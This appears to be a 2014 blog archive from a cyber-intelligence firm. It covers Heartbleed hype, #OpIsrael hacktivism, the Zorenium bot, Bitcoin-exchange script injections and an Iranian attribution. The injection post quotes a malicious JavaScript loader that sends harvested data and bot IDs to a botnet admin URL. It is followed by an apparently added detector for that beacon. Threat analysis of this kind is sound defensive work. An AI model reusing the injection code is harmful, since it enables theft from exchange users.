Why Scaring Is NOT an Effective Technique for Increasing Cyber Security?

There is a big hole in the Internet and it’s bleeding passwords. Or at least that is what one would understand from following various media reports about “Heartbleed”, that ominous flaw in the design of the Internet’s basic encryption method, SSL. Just by reading (and listening to and watching) the media, one could be excused for thinking that the Internet as we know it has come to an end. Slogans like “Internet safety is gone” and “Replace all your passwords now!” were being shouted repeatedly (didn’t they tell us that passwords were useless anyway? And didn’t they say that 99.9% of passwords are 123456 anyway?)

Regardless of the actual severity of this flaw, two things come to mind when analyzing the public and media’s behavior regarding Heartbleed. The first is that the media is thirsty for cyber-related stories, and is willing to blow any story out of proportion just to make the headlines – especially if it can be said to be “relevant to everyone” and “puts us all in danger.” But this is not surprising – there is a very unhealthy relationship between the media, the Cybersec industry and the public – each doing its share to evoke panic and misinformation.

What I find more disconcerting is that some people and organizations use such incidents to increase awareness of cyber threats and turn this into a call for action. While there is nothing wrong with raising awareness, I do believe that overdoing it – i.e. scaring people – achieves the opposite effect. Want an easy way of verifying this? Just ask the people around you (normal folk, not industry techies) if they have heard of Heartbleed. Many of them (especially in the U.S.) will probably say yes. Then ask how many of them have changed their passwords as a result of this being made public. I can almost guarantee that the answer will be zero. The explanation for this is simple – when people are presented with a catastrophe, they tend to do absolutely nothing. If nothing is safe anymore, then why bother doing something?

And that is exactly the problem. By creating panic, we also create apathy, when we should evoke emotion and move people to act – seek professional advice, check their systems for breaches, whatever. We should be stating very clearly the REAL threats and the REAL remedies, even if they make less appealing headlines. Only then do we stand the slightest chance that the “Average Joe” will stop, listen and act differently than before. “Make them aware, not scared” should be our motto.


April 7, 2014 OpIsrael Campaign Summary Presentation

The #OpIsrael Birthday campaign took place as scheduled on April 7 and involved thousands of participants from all over the Muslim world, from Indonesia in the East to Morocco in the West. The following presentation by Gilad Zahavi, SenseCy Intelligence Director, summarizes the campaign and offers insights into the participants’ characteristics and tactics, as well as predictions for future campaigns.

SenseCy at the Defensive Cyberspace Operations & Intelligence (DCOI) Conference, Tel Aviv, April 8-9, 2014

We are proud to announce that SenseCy will be attending the DCOI Conference (Defensive Cyberspace Operations & Intelligence)!


SenseCy CTO Mr. Assaf Keren will be a panelist in a session discussing Cyber Intelligence, and we will host a two-hour seminar.

The SenseCy seminar will review the world of Cyber Intelligence and try to map which types of data are available to companies and organizations that seek to defend themselves. We will do so using real-world intelligence collected and analyzed by SenseCy’s Cyber Intelligence analysts. The seminar will be held on the second day of the conference (April 9) at 14:00, at no extra cost. Seats are limited, so hurry and register!

For our friends and followers only – get a 20% discount off standard rate by using this coupon code: “944420” when registering.

Zorenium Bot: Follow-up

This is a guest post by Dimitry, a forensics expert who will be joining our team soon.


As a follow-up to our previous post, here is a quick overview of some of Zorenium’s capabilities.

Please note that we are still in the process of fully analyzing this bot’s capabilities, so this post is mostly based on the information published by the bot maker.

Without a doubt, one of the most interesting modules to start with would be the FakeShutDown mechanism. If it indeed operates as the author claims it does, then it is definitely a new “way of thinking”.

In essence, the authors of Zorenium are faking the shutdown process of a machine. The code imitates the entire process (once the shutdown sequence is initiated by the user), including the proper images and even – and this is quite fascinating – slowing down the computer fans to eliminate the noise.

In my humble opinion, it is quite impressive.

The bot has multiple management interfaces (such as IRC and I2P), and all come with a great set of 256-bit AES keys.

Another interesting aspect would be the implementation of the steganography module. The steganography module is not a “regular” one, and it makes this bot more sophisticated than others. I am curious to see how that implementation works.

Another funky aspect of the bot would be what the author called “CHRISTMAS USERKIT4 SPECIAL ADDON”. Amongst the various features, the bot will replicate a new disk drive and will drop the core DLLs onto it. Then it will encrypt the hard drive and thus protect it from various AV and anti-malware mechanisms. Pretty sweet if you ask me.

The cherry on this ice cream would be the iOS module. This is definitely the first bot that I have seen that actually operates “cross-platform”. It can infect Android, Windows and iOS systems – a true nightmare for all security specialists. The main question regarding iOS still remains – are only jailbroken phones at risk, or is it much, much worse?

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin

From publicized breaches of Bitcoin trading sites to wild fluctuations of its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mt. Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and the level of security exchange sites provide. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcoin exchange sites, there is a new trend: using the ability of Trojans to hijack HTTP sessions, or plain old XSS and CSRF attacks, the attackers inject site-specific code into the users’ sessions, then scan for available funds in the user accounts and steal money from them.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way, and are clearly written by the same author.

Below is an excerpt from one of the injections:

S: function(data) {
    // create a script element that loads the next stage from the botnet's admin server
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.async = false;
    // the request URL carries the site marker, botnet and bot identifiers and the harvested data
    s.src = "{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=" + data + "&rnd=" + Math.random();
    s.onerror = s.onload = s.onreadystatechange = function() {
        if (!this.loaded && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete')) {
            this.onerror = this.onload = this.onreadystatechange = null;
        }
    };
    // insert the element into <head>, or directly into the document if there is no <head>
    if (document.getElementsByTagName('head').length) {
        document.getElementsByTagName('head')[0].appendChild(s);
    } else {
        document.appendChild(s);
    }
}

In the continuation of the code, the attackers change the CSS settings of the site, and replace the values of the send-to-address, send-value and send-button elements. All in all, this is very simple and elegant code that makes use of the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).
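Because the injection loads its next stage from the botnet's admin URL, the beacon in the excerpt above (`?s=bitcoin&v=2&m=...&b=...&t=...&rnd=...`) is one thing a web proxy or egress log can be searched for. The following is an added example (not code from the post or from the injection's author) that flags log lines whose request URL has that parameter shape; the log format and sample lines are constructed.

```javascript
// Added example: detect requests matching the beacon shape of the injection loader
//   {ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=<data>&rnd=<Math.random()>
// Meant to be run over proxy / egress access logs. Runs under Node.js (global URL).

const BEACON_KEYS = ["s", "v", "m", "b", "t", "rnd"];

function looksLikeInjectBeacon(rawUrl) {
  let u;
  try {
    // relative URLs are resolved against a placeholder base so parsing never throws
    u = new URL(rawUrl, "http://placeholder.invalid");
  } catch (e) {
    return false;
  }
  const p = u.searchParams;
  // all beacon parameters must be present, and the site marker must be "bitcoin"
  if (!BEACON_KEYS.every((k) => p.has(k))) return false;
  if (p.get("s") !== "bitcoin") return false;
  // rnd is produced by Math.random() in the loader: a decimal fraction such as 0.4321
  return /^0\.\d+$/.test(p.get("rnd") || "");
}

// Constructed sample log lines in a minimal "client-ip method url status" format.
// Hosts and identifiers are placeholders, not indicators from the original post.
const SAMPLE_LOG = [
  "10.0.0.5 GET http://exchange.example/api/balance 200",
  "10.0.0.5 GET http://c2.example.invalid/?s=bitcoin&v=2&m=eu1&b=1337&t=login&rnd=0.4321 200",
  "10.0.0.7 GET http://cdn.example/js/app.js?v=2&s=bitcoin 200",
  "10.0.0.9 GET http://c2.example.invalid/?s=bitcoin&v=2&m=eu1&b=42&t=balance&rnd=0.99 404",
];

// Returns one {ip, url} entry per log line whose URL matches the beacon shape.
function findBeacons(logLines) {
  const hits = [];
  for (const line of logLines) {
    const [ip, , url] = line.trim().split(/\s+/);
    if (url && looksLikeInjectBeacon(url)) hits.push({ ip, url });
  }
  return hits;
}

console.log(findBeacons(SAMPLE_LOG));
```

The check keys on the full parameter set rather than on any host, so it still fires when the admin URL changes between campaigns; the same logic can be ported to a SIEM query over the URL field.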

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Special Launch Offer – Register to our Cyber Intelligence Feeds By March 31 and Receive a 50% Discount!

We are celebrating the launch of our cyber-intelligence feeds service and we are offering a 50% discount on annual subscriptions.

The offer applies to all feed types (News, Hacktivism and Cyber Crime) and is valid until March 31, 2014.

To enjoy this offer, register to our website (https://www.sensecy.com/products/) and select the desired feed you wish to subscribe to. On checkout, enter this coupon code: SENSECYMARCH2014.

SenseCy Cyber Intelligence Feeds

The offer applies to all subscriptions purchased by March 31 and is valid for 12 months.

March 10 Hacktivist Campaign – “Op” or “Flop”?

Several hacktivist groups planned to launch a cyber assault (“Op”) against Israel on March 10, as a prequel to a major assault scheduled for April 7.

Although the Op was led by the capable militant groups Red Hack (Turkey) and AnonGhost (Tunisia), it did not appear to manifest fully – the scope of the attacks and the extent of damage were marginal at best. Several private Israeli websites were hacked or DDoSed, and some email addresses belonging to Bank of Israel employees were leaked (no passwords or additional details). The Op incorporated several alleged attempts to hack Israeli government sites. One of these was recorded as part of a tutorial on March 9 – a Tunisian hacker affiliated with AnonGhost uploaded a tutorial to YouTube explaining to beginners how to hack websites with different tools, in order to participate in the #OpIsrael attacks on April 7, 2014. The video demonstrates an attempt to hack an Israeli government website with ByteDos, LOIC, Snake Bite and more. It should be mentioned that this video is one of many uploaded to YouTube during the preparations for #OpIsrael and other cyber campaigns.

https://www.youtube.com/watch?v=uAjmDDxR2Y8&list=UUZuiY5Awp7xdQTzZyqXFywQ

YouTube tutorial of attempted hack of Israeli site

In conclusion, it seems that the March 10 “Op” cannot be labeled a success, not even in terms of a grand rehearsal for the upcoming April campaign.

SenseCy is Hiring! Come Join the Cyber Intelligence Team

We are looking for two analysts to join our Cyber Intelligence Team: a native English speaker (JB-309) and a Chinese speaker (JB-310):

1. Collect Open-Source Intelligence (OSINT), mainly on cyber security

2. Analyze technical intelligence and produce reports in English

3. Good understanding of cyber security

4. Ability to analyze technical data and extract crucial details

5. Ability to work independently and lead complex projects

6. Experience in Web Intelligence (WEBINT) methodologies – advantage

7. Knowledge of foreign languages – advantage

8. Knowledge of cyber security – advantage

Please send your CV to info [at] sensecy.com (and indicate the job number)

Qods Freedom Hacker Group – Possible Iranian Involvement in Cyber Activity against Israel

In late July and early August 2013, a Gaza-based hacker group named “Qods Freedom” launched a cyber-operation against Israeli websites. The attack comprised distributed denial-of-service (DDoS) attacks, website defacements and attempted bank account breaches.

“Qods Freedom” Facebook page

The DDoS-affected sites were Israel Railways, El Al (Israel’s national airline) and a leading daily newspaper. The attacks were all effective, topping at about 3.2 Gb/sec, rendering the sites inaccessible for many hours.

Screenshot posted by the group showing El Al site down due to their attack

The group defaced over 600 sites, most of them related to two hosting service providers (likely to have been compromised). The defacement messages suggest that the motivation for the attack was to commemorate “Quds Day” – the last Friday of Ramadan. The group did not attempt to conceal its actions. Quite the contrary – it has an official Facebook page and Imageshack account where it posted images purportedly depicting the breach of Israeli bank accounts.

The political affiliation of the group seems very clear – hardcore Palestinian, anti-Israeli. This was also evident from pictures they posted on the defaced sites, which included images of the Dome of the Rock, the Palestinian flag, footage of protesters skirmishing with IDF soldiers, a portrait of Hezbollah leader Hassan Nasrallah and a quote from his famous “Spider Web” speech, which he delivered in southern Lebanon in 2000 (where he predicted that Israel would break apart like spider webs in the slightest wind).

The group’s defacement signature quoting Nasrallah with a typo

After the attack subsided, SenseCy cyber intelligence analysts decided to take a closer look at the actions of this so-called Palestinian group. Gilad Zahavi, Director of Cyber Intelligence, recounted: “Something just didn’t add up. We were seeing many indications that this group was not what it portrayed itself to be, so we decided to dig deeper.” Using virtual entities (some of which have been in operation for some time, and are used to collect information on the vibrant hacking scene in Gaza), they started sniffing around on Palestinian forums and social media groups, but no one seemed to know much about this group. With little else to go on, the team looked again at the “signature” the group left after defacing one website. And there it was – a very uncharacteristic typo in the transcript of Nasrallah’s famous speech, one that no native Arabic speaker would make. This raised suspicions that this group might not be Arab at all. A closer look at the font used to type the message confirmed that it originated from a Farsi-language keyboard.

Focusing on the Iranian connection, the team uncovered several other indications of the true origins of the group. For starters, “Quds Day” is mostly celebrated by the Iranian government and Hezbollah, not by Palestinian Sunnis. Secondly, the only references to these attacks (anywhere in the Muslim world) have come from the Iranian media. Two additional Iranian groups, “Iranian Data Coders” and “Persian Flag Guards”, use the same defacement signature, indicating at least some affiliation to Iranian cyber groups. The last telltale sign was that Iranian hacker groups often choose to masquerade as Arab hackers, choosing Arabic instead of Farsi names. A notable example is the “Izz ad-Din al-Qassam Cyber Fighters”, perceived to be linked to the Palestinian Hamas organization, but in fact operated by the Iranian regime.

So there you have it – an Iranian group with high technical capabilities, masquerading as a Palestinian group and attacking Israeli sites. This scheme was uncovered not by fancy computer forensics, but by good old-fashioned intelligence work, built on linguistic and cultural expertise, combined with a deep understanding of the cyber domain and intimate knowledge of the Middle East hacking scene.